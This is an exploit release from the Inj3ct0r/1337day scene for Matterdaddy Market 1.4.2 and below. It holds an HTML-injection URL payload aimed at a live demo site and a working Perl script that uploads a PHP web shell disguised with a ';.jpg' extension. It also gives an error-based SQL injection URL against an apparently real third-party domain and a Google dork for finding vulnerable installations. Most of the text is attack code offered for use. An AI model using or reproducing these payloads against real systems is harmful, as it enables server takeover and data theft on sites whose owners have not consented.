Matterdaddy Market version 1.4.2 and below suffers from cross site request forgery and arbitrary file upload vulnerabilities.
0b8140e53c7c0f1f92e8675c79e10a58397a4335cc65b525b3ae336d8c75f408
# 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
# 0 _ __ __ __ 1
# 1 /' \ __ /'__`\ /\ \__ /'__`\ 0
# 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
# 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
# 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
# 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
# 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
# 1 \ \____/ >> Exploit database separated by exploit 0
# 0 \/___/ type (local, remote, DoS, etc.) 1
# 1 1
# 0 [+] Site : 1337day.com 0
# 1 [+] Support e-mail : submit[at]1337day.com 1
# 0 0
# 1 ######################################### 1
# 0 I'm KedAns-Dz member from Inj3ct0r Team 1
# 1 ######################################### 0
# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Matterdaddy Market 1.4.2 <= (XSRF/FileUpload) Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria
# Web Site : www.1337day.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# TwiTter : @kedans
# Friendly Sites : www.owasp-dz.org | owasp-dz.org/forum
# Type : php - proof of concept - webapp 0day - remote
# Tested on : Windows7 (Fr)
# Vendor : [http://market.matterdaddy.com]
###
# <3 <3 Greetings t0 Palestine <3 <3
# F-ck HaCking, Lov3 Explo8ting !
######## [ Proof / Exploit ] ################|=>
####[ (1) XSRF/HTML Injection ]=>
# http://127.0.0.1/market/index.php?q="><h1>Pene-Tested By : KedAns-Dz</h1>
# Demo : http://demo.opensourcecms.com/fbcmarket/index.php?q="><h1>Pene-Tested By : KedAns-Dz</h1>
####[ (2) File Upload .jpg ]=>
# go to : http://[target]/[path]/newItem.php?a=1
# add item info (title,name,price..etc) &..
# add u'r file (.jpg) and submited !
# Check your email and confirm u'r post ;) :p
# or use this perl script ============>
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
|====================================================|
|= Matterdaddy Market 1.4.2 File Uploader Fuzzer |
|= >> Provided By KedAns-Dz << |
|= e-mail : ked-h[at]hotmail.com |
|====================================================|
INTRO
print "\n";
print "[!] Enter URL(f.e: http://target.com): ";
chomp(my $url=<STDIN>);
print "\n";
print "[!] Enter File Path (f.e: C:\\Shell.php;.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php;.gif)
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/controller.php?op=newItem',
Content_Type => 'multipart/form-data',
Content =>
[
'md_title' => '1337day',
'md_description' => 'Inj3ct0r Exploit Database',
'md_price' => '0',
'md_email2' => 'kedans@pene-test.dz', # put u'r email here !
'city' => 'Hassi Messaoud',
'namer' => 'KedAns-Dz',
'category' => '4',
'filetoupload' => $file,
'filename' => 'k3dsh3ll.php;.jpg',
# to make this exploit as sqli change file name to :
# k3dsh3ll' [+ SQLi +].php.jpg
# use temperdata better ;)
] );
print "\n";
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
else { print "[!] Check your email and confirm u'r post! \n"; }
} else { print "[-] HTTP request Failed!\n"; }
exit;
####[ (3) SQL Injection ] ===>
# is Old 0day found by r4x0r4x (http://1337day.com/exploit/19635)
# p.o.c : /[path]/action.php?cp=1' [+ SQLi +]
# demo :
# http://www.avnv.us/classifieds/action.php?cp=1%27%20and%28select+1+from%28select+count%28*%29,concat%28%28select%20concat%28%27%3E%3E%27,version%28%29,%27%3C%3C%27%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%20--%20-
# google d0rk : intext:"Powered by Matterdaddy"
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * B.N.T * All Security and Exploits Webs
#============================================================================================================